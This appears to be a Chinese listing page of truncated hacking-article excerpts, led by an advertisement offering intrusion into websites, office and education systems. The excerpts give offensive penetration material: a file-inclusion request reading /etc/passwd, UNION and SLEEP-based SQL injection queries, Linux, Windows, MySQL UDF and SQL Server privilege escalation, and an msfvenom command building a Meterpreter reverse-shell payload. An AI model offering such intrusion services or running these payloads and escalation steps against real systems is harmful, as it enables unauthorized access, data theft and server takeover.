-
[站外广告]业务列表介绍和一般分类
业务列表介绍和一般分类:类别:攻击入侵破解开发1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量]2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。[接受授权的业务] ...
-
文件包含漏洞发现与利用
程序在引用文件的时,引用的文件名,用户可控的情况,传入的文件名没有经过合理的校验或校验不严,从而操作了预想之外的文件,就有可能导致文件泄漏和恶意的代码注入。1、本地包含漏洞:被包含的文件在服务器本地本地包含漏洞利用包含/etc/passwdhttp://www.webtester.com/in...
-
逻辑漏洞密码找回漏洞和利用
为了防止用户遗忘密码,大多数网站都提供了找回密码功能。常见的找回密码方式有:邮箱找回密码、根据密码保护问题找回密码、根据手机号码找回密码等。虽然这些方式都可以找回密码,但实现方式各不相同。无论是哪种密码找回方式,在找回密码时,除了自己的用户密码,如果还能找回其他用户的密码,就存在密码找回漏洞。密码找...
-
SQL注入篇之mysql+php手工注入篇
1、mysql的注释符号#--空格用于注释后后面语句不再执行例如select*fromartilewhereid=1#这个部分的语句不再执行2、注入常用查询系统信息函数version(MySQL版本user(数据库用户名database(数据库名@...
-
SQL注入篇之mysql+php 爆库 爆表 爆字段
在上面一章mysql+php手工注入篇在最后用到的一个函数group_concat(可以将查询的字段的数据查询出来可以用利这个函数将mysql所有的库名查询出来1、查询所有的库http://target_sys.com/article.php?id=-1unionselect1,...
-
SQL注入篇之 mysql+php 延时注入
延时注入属于盲注入的一种,这种注入通过mysql里面的sleep(函数,这个函数的意思是延时执行多少秒。sleep通常与if一起使用例如selectif('root'='root',sleep(3,0如果字符串root等于root数据库延时3秒否则输出0延时方法是先获取数据的长...
-
从官方文档到0day挖掘思路
开篇废话我很喜欢ASRC某位大佬说过的一句话:挖洞的本质就是信息收集。一些开源项目的官方文档我们可以挖掘到很多有用信息,比如API利用、默认口令、硬编码等。本文主要以提供思路为目的,现在网上已经公开xxl-job未授权rce漏洞。在GitHub上能看到xxl-job与官网公开的文档。首先我们先通过官...
-
LINUX 内核漏洞提权
1、简介通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将权限提权到最高,如系统权限超级管理员权限。2...
-
LINUX SUID提权
1、简介SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/etc/...
-
Windows系统溢出提权
1、简介window服务器常用的是win2003win2008win2012在渗透测试中,我们获取的权限是iis_user用户组,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。2、程序权限的对比在iis里面权限依次的...
-
mysql udf 提权
1、简介在mysql可以使用自定义函数进行提权,udf=userdefinedfunction用户自定义函数对于自定义的函数在mysql5.1版本以后就需要放在插件插件目录/lib/plugin,文件后缀微dll,c语言编写2、插件目录可以使用语句查询plugin插件目录sho...
-
Sqlserver提权
1、简介如果网站里面使用的数据库是sqlserver那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定的系统权限,还要看管理员开始安装sqlserver的权限设置。2、查找帐号和密码web.configconfig.aspconn.aspxdatabase.aspx3、开启xp_cmd...
-
zend nc 提权
1、简介在php里面有一个扩展是zend这个是用解析phpzend脚本加密文件。如果服务器安装了zend如果ZendExtensionManager.dll权限可以修改,那就可以用其他dl替换这dll文件。查找ZendExtensionManager.dllC:\ZkeysSoft\Zen...
-
zend反弹shell提权
这篇是接着上篇内容所说。Zend_DLL_Hijacking.exe执行远控msfconsole生成反弹shell生成攻击载荷msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.0.106lport=12345-fexe&...